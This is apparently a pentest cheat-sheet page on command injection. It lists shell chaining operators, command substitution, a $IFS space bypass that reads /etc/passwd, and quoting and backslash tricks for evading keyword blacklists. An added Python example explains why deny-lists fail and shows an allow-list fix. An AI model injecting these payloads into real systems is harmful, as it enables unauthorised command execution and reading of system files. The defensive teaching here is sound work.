PwnBook

Command Injection

Last updated 1 month ago

Chaining and Invoking

;    # Executes one command and then another
&    # Executes a command in the background, followed by the other one
|    # Pipes the output of the first command as input to the second command
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

It's also possible to inject commands via command substitution, where the output of a command is captured and used in another context.

$(command)    # Both Windows and Linux systems
`command`     # Only Linux systems

Bypasses

Space Bypass

Where spaces are filtered, the Internal Field Separator variable $IFS can be used in their place. The default value of IFS is a space, a tab, and a newline.

cat$IFS/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both Windows and Linux systems
'w'h'o'a'm'i     # Only Linux systems
wh''oami         # Both Windows and Linux systems

# Backslashes
\w\h\o\a\m\i     # Only Linux systems
w\h\o\a\m\i      # Only Linux systems

# $()
wh$()oami        # Only Linux systems
wh$(echo oa)mi   # Only Linux systems

# ``
wh``oami         # Only Linux systems
wh`echo oa`mi    # Only Linux systems

# $@
wh$@oami         # Only Linux systems
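
The forms above work because a deny-list filter inspects the raw string while the shell executes the string after quote removal and expansion. The following is an added example, not part of the original page: it runs a hypothetical deny-list over strings from this page, then shows the fix of validating against an allow-list and building an argv list that no shell parses. The deny-list contents, the hostname parameter, the `ping` invocation and all function names are assumptions for illustration.

```python
import re
import shlex

# Hypothetical deny-list filter of the kind the forms above slip past.
DENYLIST = ("whoami", " ", ";", "&", "|")

def denylist_allows(value: str) -> bool:
    """Naive filter: accept anything that contains no listed substring."""
    return not any(bad in value for bad in DENYLIST)

def shell_view(value: str) -> list[str]:
    """Words a POSIX shell sees after quote and backslash removal."""
    return shlex.split(value, posix=True)

# Allow-list: the parameter is only ever meant to be a hostname (assumption).
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")

def build_argv(host: str) -> list[str]:
    """Validate, then return an argv list for subprocess.run(argv).

    No shell parses the value, so chaining operators, substitution and
    $IFS have no special meaning even if validation were ever loosened.
    """
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected: {host!r}")
    return ["ping", "-c", "1", host]

def is_rejected(value: str) -> bool:
    """True when the allow-list refuses the value."""
    try:
        build_argv(value)
    except ValueError:
        return True
    return False

# Constructed sample input: strings taken from the lists on this page.
SAMPLES = ["wh''oami", r"w\h\o\a\m\i", "wh$@oami", "cat$IFS/etc/passwd"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}: deny-list allows={denylist_allows(s)}, "
              f"allow-list rejects={is_rejected(s)}")
    print(shell_view("wh''oami"), shell_view(r"w\h\o\a\m\i"))
    print(build_argv("example.com"))
```

`fullmatch` is used rather than `match` with a `$` anchor so that a trailing newline in the input is also rejected.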
